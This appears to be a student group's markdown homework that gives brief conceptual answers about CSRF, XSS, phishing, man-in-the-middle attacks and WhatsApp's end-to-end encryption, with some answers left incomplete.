Security Attacks

security.md

Modern Security Attacks

1. What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?

2. What is an XSS attack? And what is the connection between it and cookies/sessions? What are the two main categories of XSS?

3. What is a phishing attack? How do attackers typically execute phishing attacks, and what are their primary goals?

4. What is a man-in-the-middle (MITM) attack? How do attackers perform MITM attacks, and what can be the consequences for victims?

5. What is End-to-End encryption (E2EE)? Provide an example of a well-known app using E2EE, and explain how that app uses it.

Nhlanhla Msibi @Nhlanhla-advocate
Mpho Oganne
Nonhlanhla Mazibuko

1. A Cross-Site Request Forgery (CSRF) attack is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. Essentially, the attacker tricks the victim into making an unwanted request to a server on which they are authenticated. The attacker needs to get the user to execute this malicious request. This is often done by embedding the request in a malicious link, image, or script on a web page that the user visits.

It's called a one-click attack because, typically, all it takes for the attack to be executed is a single click by the user on a seemingly harmless link or button. In many cases, the user doesn't even realize they are making the request because the action can be embedded in an invisible image or an automatically executing script.

2. XSS attack is called cross-site scripting, which is a vulnerability in web applications that allows attackers to inject malicious scripts into trusted websites. These scripts are then executed by unsuspecting users. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to an end users. The injected code is then delivered to other users who access the web page or web application. When these users' browsers load the page, they execute the malicious script as part of the normal content.

XSS attacks allows an attacker to execute scripts in the context of a user's browser, making it possible for them to potentially steal cookies and the session identifiers stored in the cookies. This can lead to session hijacking, where the attacker gains unauthorized access to the user's session where they can impersonate the victim, performing actions and accessing data as if they were the legitimate use.

Main categories of XSS:

• Stored XSS which is also referred as persistent XSS:
  An attacker may inject malicious content (referred to as the payload), most often JavaScript code, into the target application which can then be stored in the application's database permanently. When a victim opens the affected web page in a browser, the XSS attack payload is served to the victim’s browser, which means that victims will end up executing the malicious script once the page is viewed in their browser. An example would be an attacker posting a comment on a blog post with the malicious code. The blog stores this comment in its database without proper sanitization. When other users view the blog post, the malicious script is executed in their browsers, potentially stealing their session cookies

• Reflected XSS:
  the attacker’s payload has to be a part of the request that is sent to the web server. It is then reflected back in such a way that the HTTP response includes the payload from the HTTP request. This often occurs when the user is tricked into clicking a malicious link or submitting a specially crafted form. The injected script is then included in the server's response to the user, and the browser executes it. This type of XSS is usually targeted at a single user.

3. phishing attack is a type of cyber attack where an attacker disguises themselves as a trustworthy entity to deceive individuals into divulging sensitive information such as usernames, passwords, credit card numbers, or other personal information. Phishing is a form of social engineering, relying on manipulating human psychology rather than exploiting technical vulnerabilities.

Crafting the Bait:
Email: The attacker creates a fake email that looks like it's from a legitimate source,like a bank, a social media site, or an online service. The email usually contains a message that aims to create a sense of urgency or curiosity like getting a message that says "your account has been compromised click here to secure it".

4. A Man-in-the-Middle attack is a type of cyber attack where the attacker secretly intercepts and relays communication between two parties who believe they are directly communicating with each other. The attacker can eavesdrop, alter, or inject false information into the communication, effectively taking control of the conversation without the knowledge of the legitimate parties.

The consequences of the victim are:

Financial Loss:
Victims may experience unauthorized transactions or withdrawals from their bank accounts.
Businesses may suffer from theft of financial information or intellectual property.
5. End-to-End Encryption is a method of data transmission where only the communicating users can read the messages. In E2EE, the data is encrypted on the sender's device and only decrypted on the recipient's device, ensuring that no intermediaries, including service providers, can access the contents of the communication.
WhatsApp uses end-to-end-encryption(What they want us to believe)

When a user sends a message, it is encrypted on their device using a unique encryption key.
This encryption key is only known to the sender and the intended recipient. Even WhatsApp servers do not have access to this key.